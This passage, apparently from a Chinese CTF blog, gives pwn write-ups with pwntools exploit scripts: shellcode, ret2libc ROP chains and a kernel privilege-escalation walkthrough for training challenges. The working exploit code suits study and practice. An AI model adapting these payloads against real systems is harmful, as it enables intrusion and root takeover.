class="number">16</span>+p64(<span class="number">0x00601000</span>+<span class="number">0x500</span>+<span class="number">0x10</span>)+<span class="string">'a'</span>*<span class="number">32</span>+p64(<span class="number">0x4009DD</span>)</span><br><span class="line">p.send(payload)</span><br><span class="line">p.recvuntil(<span class="string">'.\n'</span>)</span><br><span class="line">write_leak = u64(p.recv(<span class="number">8</span>))</span><br><span class="line">libcbase = write_leak - libc.sym[<span class="string">'write'</span>]</span><br><span class="line">open_addr = libcbase + libc.sym[<span class="string">'open'</span>]</span><br><span class="line">pr(<span class="string">'libcbase'</span>,libcbase)</span><br><span class="line"></span><br><span class="line">payload = <span class="string">'a'</span>*<span class="number">0x18</span>+p64(<span class="number">0x00601000</span>+<span class="number">0x500</span>+<span class="number">0x10</span>+<span class="number">0x10</span>)+asm(shellcraft.<span class="built_in">open</span>(<span class="string">'flag'</span>))</span><br><span class="line">payload += asm(shellcraft.read(<span class="number">3</span>,<span class="number">0x00601000</span>+<span class="number">0x500</span>+<span class="number">0x100</span>,<span class="number">100</span>))</span><br><span class="line">payload += asm(shellcraft.write(<span class="number">1</span>,<span class="number">0x00601000</span>+<span class="number">0x500</span>+<span class="number">0x100</span>,<span class="number">100</span>))</span><br><span class="line">p.sendline(payload)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<p>搞不懂控制 rbp 为 0x00601000+0x500+0x10 是为什么。。。。</p>
<h1 id="week2"><a href="#week2" class="headerlink" title="week2"></a>week2</h1><h2 id="rop-primary"><a href="#rop-primary" class="headerlink" title="rop_primary"></a>rop_primary</h2><p><img src="https://raw.githubusercontent.com/YTrick/image/branch/image/20210309195557.png" alt="20210309195557"></p>
<p><img src="https://raw.githubusercontent.com/YTrick/image/branch/image/20210309195620.png" alt="20210309195620"></p>
<p><img src="https://raw.githubusercontent.com/YTrick/image/branch/image/20210309195630.png" alt="20210309195630"></p>
<p>分析下来就是程序会给两个矩阵,我们要一个个输入两个矩阵相乘的结果来通过 check 函数,从而利用 vuln 去 rop</p>
<p>首先考的就是 python 功底,当然我是不太过关的。。。。</p>
<p>exp:</p>
<figure class="highlight py"><table><tr><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">read_matrix</span>():</span></span><br><span class="line"> matrix = []</span><br><span class="line"> <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line"> line = p.recvuntil(<span class="string">'\n'</span>).strip() </span><br><span class="line"> <span class="keyword">if</span> <span class="string">'\t'</span> <span class="keyword">not</span> <span class="keyword">in</span> line:</span><br><span class="line"> <span class="keyword">break</span></span><br><span class="line"> row = []</span><br><span class="line"> <span class="keyword">for</span> num <span class="keyword">in</span> line.split(<span class="string">'\t'</span>):</span><br><span class="line"> row.append(<span class="built_in">int</span>(num))</span><br><span class="line"> <span class="built_in">print</span>(line)</span><br><span class="line"> matrix.append(row)</span><br><span class="line"> <span class="keyword">return</span> matrix</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">multi_matrix</span>(<span class="params">a, b</span>):</span></span><br><span class="line"> rows = <span class="built_in">len</span>(a)</span><br><span class="line"> mid = <span class="built_in">len</span>(b)</span><br><span class="line"> cols = <span class="built_in">len</span>(b[<span class="number">0</span>])</span><br><span class="line"> result = []</span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(rows):</span><br><span class="line"> row = []</span><br><span class="line"> <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(cols):</span><br><span class="line"> num = <span class="number">0</span></span><br><span class="line"> <span class="keyword">for</span> k <span class="keyword">in</span> <span class="built_in">range</span>(mid):</span><br><span class="line"> num += a[i][k] * b[k][j]</span><br><span class="line"> row.append(num)</span><br><span class="line"> result.append(row)</span><br><span class="line"> <span class="keyword">return</span> result</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">'A:\n'</span>)</span><br><span class="line">a = read_matrix()</span><br><span class="line">b = read_matrix()</span><br><span class="line"></span><br><span class="line">result = multi_matrix(a, b)</span><br></pre></td></tr></table></figure>
<p>之后就是简单的 rop 了</p>
<p>exp:</p>
<figure class="highlight py"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> *</span><br><span class="line"><span class="comment">#coding=utf-8</span></span><br><span class="line"><span class="comment">#context.terminal = ['gnome-terminal', '-x', 'zsh', '-c']</span></span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line"></span><br><span class="line">p = remote(<span class="string">'159.75.104.107'</span>,<span class="number">30372</span>)</span><br><span class="line"><span class="comment">#p = process('./rop_primary')</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">read_matrix</span>():</span></span><br><span class="line"> matrix = []</span><br><span class="line"> <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line"> line = p.recvuntil(<span class="string">'\n'</span>).strip() </span><br><span class="line"> <span class="keyword">if</span> <span class="string">'\t'</span> <span class="keyword">not</span> <span class="keyword">in</span> line:</span><br><span class="line"> <span class="keyword">break</span></span><br><span class="line"> row = []</span><br><span class="line"> <span class="keyword">for</span> num <span class="keyword">in</span> line.split(<span class="string">'\t'</span>):</span><br><span class="line"> row.append(<span class="built_in">int</span>(num))</span><br><span class="line"> <span class="built_in">print</span>(line)</span><br><span class="line"> matrix.append(row)</span><br><span class="line"> <span class="keyword">return</span> matrix</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">multi_matrix</span>(<span class="params">a, b</span>):</span></span><br><span class="line"> rows = <span class="built_in">len</span>(a)</span><br><span class="line"> mid = <span class="built_in">len</span>(b)</span><br><span class="line"> cols = <span class="built_in">len</span>(b[<span class="number">0</span>])</span><br><span class="line"> result = []</span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(rows):</span><br><span class="line"> row = []</span><br><span class="line"> <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(cols):</span><br><span class="line"> num = <span class="number">0</span></span><br><span class="line"> <span class="keyword">for</span> k <span class="keyword">in</span> <span class="built_in">range</span>(mid):</span><br><span class="line"> num += a[i][k] * b[k][j]</span><br><span class="line"> row.append(num)</span><br><span class="line"> result.append(row)</span><br><span class="line"> <span class="keyword">return</span> result</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">'A:\n'</span>)</span><br><span class="line">a = read_matrix()</span><br><span class="line">b = read_matrix()</span><br><span class="line"></span><br><span class="line">result = multi_matrix(a, b)</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> row <span class="keyword">in</span> result:</span><br><span class="line"> <span class="keyword">for</span> num <span class="keyword">in</span> row:</span><br><span class="line"> p.sendline(<span class="built_in">str</span>(num))</span><br><span class="line"></span><br><span class="line">elf = ELF(<span class="string">'./rop_primary'</span>)</span><br><span class="line">pus_got = elf.got[<span class="string">'puts'</span>]</span><br><span class="line">pus_plt = elf.plt[<span class="string">'puts'</span>]</span><br><span class="line"></span><br><span class="line">pop_rdi = <span class="number">0x0000000000401613</span></span><br><span class="line">pop_rsi_r15 = <span class="number">0x0000000000401611</span></span><br><span class="line">vuln_addr = <span class="number">0x000000000040157B</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">payload = <span class="string">'a'</span>*<span class="number">0x38</span> + p64(pop_rdi) + p64(pus_got) + p64(pus_plt) + p64(vuln_addr)</span><br><span class="line"></span><br><span class="line">p.sendline(payload)</span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">'try your best\n'</span>)</span><br><span class="line"></span><br><span class="line">puts_addr = u64(p.recv(<span class="number">6</span>).ljust(<span class="number">8</span>,<span class="string">b'\x00'</span>))</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">hex</span>(puts_addr))</span><br><span class="line"></span><br><span class="line">offset = puts_addr - <span class="number">0x0875a0</span> </span><br><span class="line">system_addr = offset + <span class="number">0x055410</span> </span><br><span class="line">bin_sh = offset + <span class="number">0x1b75aa</span> </span><br><span class="line"></span><br><span class="line">ret_addr = <span class="number">0x000000000040101a</span></span><br><span class="line"></span><br><span class="line">payload = <span class="string">'a'</span>*<span class="number">0x38</span> + p64(ret_addr) + p64(pop_rdi) + p64(bin_sh) + p64(system_addr)</span><br><span class="line"></span><br><span class="line">p.sendline(payload)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">p.interactive()</span><br><span class="line"></span><br></pre></td></tr></table></figure>
]]></content>
<categories>
<category>WriteUp</category>
</categories>
</entry>
<entry>
<title>Linux Kernel 0x1</title>
<url>/article/Linux%20Kernel%200x1/</url>
<content><![CDATA[<h1 id="Linux-Kernel-0x1"><a href="#Linux-Kernel-0x1" class="headerlink" title="Linux Kernel 0x1"></a>Linux Kernel 0x1</h1><!-- 文章页 配置 -->
<h1 id="前置知识"><a href="#前置知识" class="headerlink" title="前置知识"></a>前置知识</h1><h2 id="内核保护"><a href="#内核保护" class="headerlink" title="内核保护"></a>内核保护</h2><h3 id="SMAP-Supervisor-Mode-Access-Prevention"><a href="#SMAP-Supervisor-Mode-Access-Prevention" class="headerlink" title="SMAP(Supervisor Mode Access Prevention)"></a>SMAP(Supervisor Mode Access Prevention)</h3><p>管理模式访问保护。禁止内核访问用户空间的数据。</p>
<h3 id="SMEP-Supervisor-Mode-Execution-Prevention"><a href="#SMEP-Supervisor-Mode-Execution-Prevention" class="headerlink" title="SMEP(Supervisor Mode Execution Prevention)"></a>SMEP(Supervisor Mode Execution Prevention)</h3><p>管理模式执行保护。禁止执行用户空间的代码。类似于用户态的NX保护。</p>
<p>ps:在内核命令行中添加nosmap和nosmep禁用。</p>
<h3 id="Stack-protector"><a href="#Stack-protector" class="headerlink" title="Stack protector"></a>Stack protector</h3><p>类似于用户态的Canary。</p>
<h3 id="KASLR"><a href="#KASLR" class="headerlink" title="KASLR"></a>KASLR</h3><p>内核地址空间分布随机化。类似于用户态的ASLR。</p>
<h3 id="Kernel-Address-Display-Restriction"><a href="#Kernel-Address-Display-Restriction" class="headerlink" title="Kernel Address Display Restriction"></a>Kernel Address Display Restriction</h3><p>在linux内核漏洞利用中常常使用commit_creds和prepare_kernel_cred来完成提权,它们的地址可以从/proc/kallsyms中读取。从Ubuntu 11.04和RHEL 7开始,/proc/sys/kernel/kptr_restrict被默认设置为1以阻止通过这种方式泄露内核地址。(非root用户不可读取)</p>
<h2 id="内核提权"><a href="#内核提权" class="headerlink" title="内核提权"></a>内核提权</h2><h3 id="方式"><a href="#方式" class="headerlink" title="方式"></a>方式</h3><ol>
<li>修改cred结构体</li>
<li>调用<code>commit_creds(prepare_kernel_cred(0))</code>完成提权</li>
</ol>
<h3 id="cred结构体"><a href="#cred结构体" class="headerlink" title="cred结构体"></a>cred结构体</h3><p>每个进程中都有一个 cred 结构,这个结构保存了该进程的权限等信息(uid,gid 等),如果能修改某个进程的 cred,那么也就修改了这个进程的权限。</p>
<p>struct cred <a href="https://code.woboq.org/linux/linux/include/linux/cred.h.html#cred">源码</a> 如下:</p>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">cred</span> {</span></span><br><span class="line"> <span class="keyword">atomic_t</span> usage;</span><br><span class="line"><span class="meta">#<span class="meta-keyword">ifdef</span> CONFIG_DEBUG_CREDENTIALS</span></span><br><span class="line"> <span class="keyword">atomic_t</span> subscribers; <span class="comment">/* number of processes subscribed */</span></span><br><span class="line"> <span class="keyword">void</span> *put_addr;</span><br><span class="line"> <span class="keyword">unsigned</span> magic;</span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> CRED_MAGIC 0x43736564</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> CRED_MAGIC_DEAD 0x44656144</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">endif</span></span></span><br><span class="line"> <span class="keyword">kuid_t</span> uid; <span class="comment">/* real UID of the task */</span></span><br><span class="line"> <span class="keyword">kgid_t</span> gid; <span class="comment">/* real GID of the task */</span></span><br><span class="line"> <span class="keyword">kuid_t</span> suid; <span class="comment">/* saved UID of the task */</span></span><br><span class="line"> <span class="keyword">kgid_t</span> sgid; <span class="comment">/* saved GID of the task */</span></span><br><span class="line"> <span class="keyword">kuid_t</span> euid; <span class="comment">/* effective UID of the task */</span></span><br><span class="line"> <span class="keyword">kgid_t</span> egid; <span class="comment">/* effective GID of the task */</span></span><br><span class="line"> <span class="keyword">kuid_t</span> fsuid; <span class="comment">/* UID for VFS ops */</span></span><br><span class="line"> <span class="keyword">kgid_t</span> fsgid; <span class="comment">/* GID for VFS ops */</span></span><br><span class="line"> <span class="keyword">unsigned</span> securebits; <span class="comment">/* SUID-less security management */</span></span><br><span class="line"> <span class="keyword">kernel_cap_t</span> cap_inheritable; <span class="comment">/* caps our children can inherit */</span></span><br><span class="line"> <span class="keyword">kernel_cap_t</span> cap_permitted; <span class="comment">/* caps we're permitted */</span></span><br><span class="line"> <span class="keyword">kernel_cap_t</span> cap_effective; <span class="comment">/* caps we can actually use */</span></span><br><span class="line"> <span class="keyword">kernel_cap_t</span> cap_bset; <span class="comment">/* capability bounding set */</span></span><br><span class="line"> <span class="keyword">kernel_cap_t</span> cap_ambient; <span class="comment">/* Ambient capability set */</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">ifdef</span> CONFIG_KEYS</span></span><br><span class="line"> <span class="keyword">unsigned</span> <span class="keyword">char</span> jit_keyring; <span class="comment">/* default keyring to attach requested</span></span><br><span class="line"><span class="comment"> * keys to */</span></span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">key</span> __<span class="title">rcu</span> *<span class="title">session_keyring</span>;</span> <span class="comment">/* keyring inherited over fork */</span></span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">key</span> *<span class="title">process_keyring</span>;</span> <span class="comment">/* keyring private to this process */</span></span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">key</span> *<span class="title">thread_keyring</span>;</span> <span class="comment">/* keyring private to this thread */</span></span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">key</span> *<span class="title">request_key_auth</span>;</span> <span class="comment">/* assumed request_key authority */</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">endif</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">ifdef</span> CONFIG_SECURITY</span></span><br><span class="line"> <span class="keyword">void</span> *security; <span class="comment">/* subjective LSM security */</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">endif</span></span></span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">user_struct</span> *<span class="title">user</span>;</span> <span class="comment">/* real user ID subscription */</span></span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">user_namespace</span> *<span class="title">user_ns</span>;</span> <span class="comment">/* user_ns the caps and keyrings are relative to. */</span></span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">group_info</span> *<span class="title">group_info</span>;</span> <span class="comment">/* supplementary groups for euid/fsgid */</span></span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">rcu_head</span> <span class="title">rcu</span>;</span> <span class="comment">/* RCU deletion hook */</span></span><br><span class="line">} __randomize_layout;</span><br></pre></td></tr></table></figure>
<h2 id="状态切换"><a href="#状态切换" class="headerlink" title="状态切换"></a>状态切换</h2><h3 id="user2kernel-user-space-to-kernel-space"><a href="#user2kernel-user-space-to-kernel-space" class="headerlink" title="user2kernel(user space to kernel space)"></a>user2kernel(user space to kernel space)</h3><p>当发生 <code>系统调用</code>,<code>产生异常</code>,<code>外设产生中断</code>等事件时,用户态会切换到内核态</p>
<ol>
<li>通过 <code>swapgs</code> 切换 GS 段寄存器,将 GS 寄存器值和一个特定位置的值进行交换,目的是保存 GS 值,同时将该位置的值作为内核执行时的 GS 值使用。</li>
<li>将当前栈顶(用户空间栈顶)记录在 CPU 独占变量区域里,将 CPU 独占区域里记录的内核栈顶放入 rsp/esp。</li>
<li>通过 push 保存各寄存器值。</li>
</ol>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line"> ENTRY(entry_SYSCALL_64)</span><br><span class="line"> /* SWAPGS_UNSAFE_STACK是一个宏,x86直接定义为swapgs指令 */</span><br><span class="line"> SWAPGS_UNSAFE_STACK</span><br><span class="line"></span><br><span class="line"> /* 保存栈值,并设置内核栈 */</span><br><span class="line"> movq %rsp, PER_CPU_VAR(rsp_scratch)</span><br><span class="line"> movq PER_CPU_VAR(cpu_current_top_of_stack), %rsp</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">/* 通过push保存寄存器值,形成一个pt_regs结构 */</span><br><span class="line">/* Construct struct pt_regs on stack */</span><br><span class="line">pushq $__USER_DS /* pt_regs->ss */</span><br><span class="line">pushq PER_CPU_VAR(rsp_scratch) /* pt_regs->sp */</span><br><span class="line">pushq %r11 /* pt_regs->flags */</span><br><span class="line">pushq $__USER_CS /* pt_regs->cs */</span><br><span class="line">pushq %rcx /* pt_regs->ip */</span><br><span class="line">pushq %rax /* pt_regs->orig_ax */</span><br><span class="line">pushq %rdi /* pt_regs->di */</span><br><span class="line">pushq %rsi /* pt_regs->si */</span><br><span class="line">pushq %rdx /* pt_regs->dx */</span><br><span class="line">pushq %rcx tuichu /* pt_regs->cx */</span><br><span class="line">pushq $-ENOSYS /* pt_regs->ax */</span><br><span class="line">pushq %r8 /* pt_regs->r8 */</span><br><span class="line">pushq %r9 /* pt_regs->r9 */</span><br><span class="line">pushq %r10 /* pt_regs->r10 */</span><br><span class="line">pushq %r11 /* pt_regs->r11 */</span><br><span class="line">sub $(6*8), %rsp /* pt_regs->bp, bx, r12-15 not saved */</span><br></pre></td></tr></table></figure>
<h3 id="kernel2user-kernel-space-to-user-space"><a href="#kernel2user-kernel-space-to-user-space" class="headerlink" title="kernel2user(kernel space to user space)"></a>kernel2user(kernel space to user space)</h3><ol>
<li>通过 <code>swapgs</code> 恢复 GS 值</li>
<li>通过 <code>sysretq</code> 或者 <code>iretq</code> 恢复到用户控件继续执行。如果使用 <code>iretq</code> 还需要给出用户空间的一些信息(CS, eflags/rflags, esp/rsp 等)</li>
</ol>
<h2 id="文件结构"><a href="#文件结构" class="headerlink" title="文件结构"></a>文件结构</h2><h3 id="boot-sh"><a href="#boot-sh" class="headerlink" title="boot.sh"></a>boot.sh</h3><p>一个用于启动 kernel 的 shell 的脚本,多用 qemu,保护措施与 qemu 不同的启动参数有关</p>
<figure class="highlight sh"><table><tr><td class="code"><pre><span class="line">qemu-system-x86_64 \ <span class="comment">#qemu启动</span></span><br><span class="line">-m 64M \ <span class="comment">#设置虚拟RAM大小(默认128M)</span></span><br><span class="line">-kernel ./bzImage \ <span class="comment">#指定内核镜像</span></span><br><span class="line">-initrd ./core.cpio \ <span class="comment">#内核启动的文件系统</span></span><br><span class="line">-append <span class="string">"root=/dev/ram rw console=ttyS0 oops=panic panic=1 quiet kaslr"</span> \ <span class="comment">#启动界面为终端、内存文件系统RamDisk,这里还开启了kaslr</span></span><br><span class="line">-s \ </span><br><span class="line">-netdev user,id=t0, -device e1000,netdev=t0,id=nic0 \ <span class="comment">#</span></span><br><span class="line">-nographic \ <span class="comment">#非图形界面</span></span><br></pre></td></tr></table></figure>
<p>相关选项</p>
<figure class="highlight sh"><table><tr><td class="code"><pre><span class="line">-append 附加选项,指定no kaslr可以关闭随机偏移</span><br><span class="line">--nographic和console=ttyS0一起使用,启动的界面就变成当前终端</span><br><span class="line"></span><br><span class="line">-s 相当于-gdb tcp::1234的简写,可以直接通过主机的gdb远程连接</span><br><span class="line"></span><br><span class="line">-monitor配置用户模式的网络<span class="comment">#将监视器重定向到主机设备/dev/null</span></span><br><span class="line"></span><br><span class="line">-smp 用于声明所有可能用到的cpus, i.e. sockets cores threads = maxcpus.</span><br><span class="line"></span><br><span class="line">-cpu 设置CPU的安全选项</span><br><span class="line"><span class="comment">#-cpu kvm64,+smep,+smap 例如这里是开启了 smap 和 smep</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>
<h3 id="bzImage"><a href="#bzImage" class="headerlink" title="bzImage"></a>bzImage</h3><p>Linux内核镜像文件</p>
<h3 id="vmlinux"><a href="#vmlinux" class="headerlink" title="vmlinux"></a>vmlinux</h3><p>vmlinux是未压缩的内核,vmlinux 是ELF文件,即编译出来的最原始的文件。用于kernel-debug,产生system.map符号表,不能用于直接加载,不可以作为启动内核。只是启动过程中的中间媒体</p>
<h3 id="cpio"><a href="#cpio" class="headerlink" title="*.cpio"></a>*.cpio</h3><p>打包后的文件系统</p>
<h3 id="ko"><a href="#ko" class="headerlink" title="*.ko"></a>*.ko</h3><p>有漏洞的驱动文件</p>
<h3 id="init"><a href="#init" class="headerlink" title="init"></a>init</h3><p>一个内核启动的初始化文件</p>
<h1 id="启动之前"><a href="#启动之前" class="headerlink" title="启动之前"></a>启动之前</h1><h2 id="解包"><a href="#解包" class="headerlink" title="解包"></a>解包</h2><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">mkdir core</span><br><span class="line">mv core.cpio ./core/core.cpio</span><br><span class="line"><span class="built_in">cd</span> core</span><br><span class="line">cpio -idmv < core.cpio <span class="comment">#解包</span></span><br></pre></td></tr></table></figure>
<p>或者.gz?</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">mv core.cpio ./core/core.cpio.gz</span><br><span class="line"><span class="built_in">cd</span> core</span><br><span class="line">gunzip core.cpio.gz <span class="comment"># 这一步不是每个题都有的</span></span><br></pre></td></tr></table></figure>
<h2 id="打包"><a href="#打包" class="headerlink" title="打包"></a>打包</h2><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">$ rm -rf core.cpio</span><br><span class="line">$ v init <span class="comment">#修改初始文件</span></span><br><span class="line">$ find . | cpio -o --format=newc > ../rootfs.img<span class="comment">#打包</span></span><br></pre></td></tr></table></figure>
<h1 id="2018强网杯-core"><a href="#2018强网杯-core" class="headerlink" title="2018强网杯 core"></a>2018强网杯 core</h1><h2 id="checksec"><a href="#checksec" class="headerlink" title="checksec"></a>checksec</h2><figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">Arch: amd64-64-little</span><br><span class="line">RELRO: No RELRO</span><br><span class="line">Stack: Canary found</span><br><span class="line">NX: NX enabled</span><br><span class="line">PIE: No PIE (0x0)</span><br></pre></td></tr></table></figure>
<p>开了Canary</p>
<h2 id="题目分析"><a href="#题目分析" class="headerlink" title="题目分析"></a>题目分析</h2><h3 id="start-sh"><a href="#start-sh" class="headerlink" title="start.sh"></a>start.sh</h3><figure class="highlight sh"><table><tr><td class="code"><pre><span class="line">qemu-system-x86_64 \</span><br><span class="line">-m 64M \</span><br><span class="line">-kernel ./bzImage \</span><br><span class="line">-initrd ./core.cpio \</span><br><span class="line">-append <span class="string">"root=/dev/ram rw console=ttyS0 oops=panic panic=1 quiet kaslr"</span> \</span><br><span class="line">-s \</span><br><span class="line">-netdev user,id=t0, -device e1000,netdev=t0,id=nic0 \</span><br><span class="line">-nographic \</span><br></pre></td></tr></table></figure>
<p>开了kaslr,没有开启SMAP和SMEP</p>
<h3 id="init-1"><a href="#init-1" class="headerlink" title="init"></a>init</h3><p>解包之后的文件,一个内核启动的初始化文件</p>
<figure class="highlight sh"><table><tr><td class="code"><pre><span class="line"><span class="meta">#!/bin/sh</span></span><br><span class="line">mount -t proc proc /proc</span><br><span class="line">mount -t sysfs sysfs /sys</span><br><span class="line">mount -t devtmpfs none /dev</span><br><span class="line">/sbin/mdev -s</span><br><span class="line">mkdir -p /dev/pts</span><br><span class="line">mount -vt devpts -o gid=4,mode=620 none /dev/pts</span><br><span class="line">chmod 666 /dev/ptmx</span><br><span class="line">cat /proc/kallsyms > /tmp/kallsyms</span><br><span class="line"><span class="built_in">echo</span> 1 > /proc/sys/kernel/kptr_restrict</span><br><span class="line"><span class="built_in">echo</span> 1 > /proc/sys/kernel/dmesg_restrict</span><br><span class="line">ifconfig eth0 up</span><br><span class="line">udhcpc -i eth0</span><br><span class="line">ifconfig eth0 10.0.2.15 netmask 255.255.255.0</span><br><span class="line">route add default gw 10.0.2.2 </span><br><span class="line">insmod /core.ko</span><br><span class="line"></span><br><span class="line">poweroff -d 120 -f &</span><br><span class="line">setsid /bin/cttyhack setuidgid 1000 /bin/sh</span><br><span class="line"><span class="built_in">echo</span> <span class="string">'sh end!\n'</span></span><br><span class="line">umount /proc</span><br><span class="line">umount /sys</span><br><span class="line"></span><br><span class="line">poweroff -d 0 -f</span><br></pre></td></tr></table></figure>
<h3 id="有vmlinux"><a href="#有vmlinux" class="headerlink" title="有vmlinux"></a>有vmlinux</h3><h2 id="IDA分析core-ko"><a href="#IDA分析core-ko" class="headerlink" title="IDA分析core.ko"></a>IDA分析core.ko</h2><h3 id="init-module"><a href="#init-module" class="headerlink" title="init_module"></a>init_module</h3><p>创建一个proc虚拟文件,应用层通过读写该文件,即可实现与内核的交互。</p>
<p><img src="/article/Linux%20Kernel%200x1/image-20220404132302377.png" alt="image-20220404132302377"></p>
<h3 id="core-ioctl"><a href="#core-ioctl" class="headerlink" title="core_ioctl"></a>core_ioctl</h3><p>这个是ioctl函数驱动时进入的函数,可以类比一些mian函数</p>
<p><img src="/article/Linux%20Kernel%200x1/image-20220404132237103.png" alt="image-20220404132237103"></p>
<h3 id="core-read"><a href="#core-read" class="headerlink" title="core_read"></a>core_read</h3><p><code>copy_to_user()</code>拷贝64字节到用户空间a1,全局变量off可控,因此可以控制off的值来泄露canary和基地址</p>
<p>canary值在rsp+40h处</p>
<p><img src="/article/Linux%20Kernel%200x1/image-20220404132341618.png" alt="image-20220404132341618"></p>
<h3 id="core-write"><a href="#core-write" class="headerlink" title="core_write"></a>core_write</h3><p><code>copy_from_user()</code>从用户态向内核态写入数据,保存到全局变量name中</p>
<p><img src="/article/Linux%20Kernel%200x1/image-20220404132400697.png" alt="image-20220404132400697"></p>
<h3 id="core-copy-func"><a href="#core-copy-func" class="headerlink" title="core_copy_func"></a>core_copy_func</h3><p>从全局变量name中copy数据到v2。a1是可控的,绕过a1 > 63 执行<code>qmemcpy()</code>。比较的时候a1是_int64,在执行qmenmcpy的时候是unsigned _int16,当a1是负数的时候,转成无符号数就会非常大,造成溢出。</p>
<p><img src="/article/Linux%20Kernel%200x1/image-20220404132526370.png" alt="image-20220404132526370"></p>
<h2 id="利用思路"><a href="#利用思路" class="headerlink" title="利用思路"></a>利用思路</h2><ol>
<li>设置off</li>
<li>调用core_copy_func,泄露canary</li>
<li>调用write将payload写入全局变量name</li>
<li>调用core_copy_func栈溢出</li>
</ol>
<h2 id="提权"><a href="#提权" class="headerlink" title="提权"></a>提权</h2><p>劫持了流,在用户态的pwn只要弹个shell即可完成利用,但是内核态需要更多操作保证系统的稳定性。</p>
<p>我们劫持的控制流是进入内核态的,拥有特权,因此可以完成提权。</p>
<p><code>commit_creds(prepare_kernel_cred(0));</code></p>
<p>执行commit_creds(prepare_kernel_cred(0)); 创建新的凭证结构体使得uid / gid为0</p>
<p>然后执行<code>"/bin/sh"</code>就可以拿到root权限的shell</p>
<p>参考:</p>
<p><a href="https://bbs.pediy.com/thread-262425.htm#msg_header_h2_0">https://bbs.pediy.com/thread-262425.htm#msg_header_h2_0</a></p>
<p><a href="https://ctf-wiki.org/pwn/linux/kernel-mode/basic-knowledge/#struct-cred">https://ctf-wiki.org/pwn/linux/kernel-mode/basic-knowledge/#struct-cred</a></p>
<p><a href="https://bbs.pediy.com/thread-259386.htm">https://bbs.pediy.com/thread-259386.htm</a></p>
<p><a href="http://eeeeeeeeeeeeeeeea.cn/2021/11/13/kernel-pwn-%E4%BA%8C/">http://eeeeeeeeeeeeeeeea.cn/2021/11/13/kernel-pwn-%E4%BA%8C/</a></p>
<p><a href="https://blog.csdn.net/weixin_35182419/article/details/111951986">https://blog.csdn.net/weixin_35182419/article/details/111951986</a></p>
]]></content>
<categories>
<category>笔记</category>
</categories>
</entry>
<entry>
<title>NepCTF</title>
<url>/article/NepCTF/</url>
<content><![CDATA[<h1 id="NepCTF"><a href="#NepCTF" class="headerlink" title="NepCTF"></a>NepCTF</h1><span id="more"></span>
<h1 id="Pwn"><a href="#Pwn" class="headerlink" title="Pwn"></a>Pwn</h1><h2 id="xhh"><a href="#xhh" class="headerlink" title="xhh"></a>xhh</h2><p><img src="https://raw.githubusercontent.com/YTrick/image/branch/image/20210322132920.png" alt="20210322132920"></p>
<p>栈溢出,填充0x10,然后找到system cat flag函数,据地址随机化后字节不变,小端更改地址,当图片刷到小蝌蚪的图案便getshell</p>
<p>exp:</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.arch = <span class="string">'amd64'</span></span><br><span class="line">context.log_level=<span class="string">'debug'</span></span><br><span class="line"><span class="comment">#p = process('./xhh')</span></span><br><span class="line">p = remote(<span class="string">'node2.hackingfor.fun'</span>,<span class="number">35402</span> )</span><br><span class="line"><span class="comment">#p = remote('127.0.0.1',12345)</span></span><br><span class="line">payload = p64(<span class="number">0</span>) + p64(<span class="number">1</span>) + <span class="string">b"\xE1"</span></span><br><span class="line">p.send(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
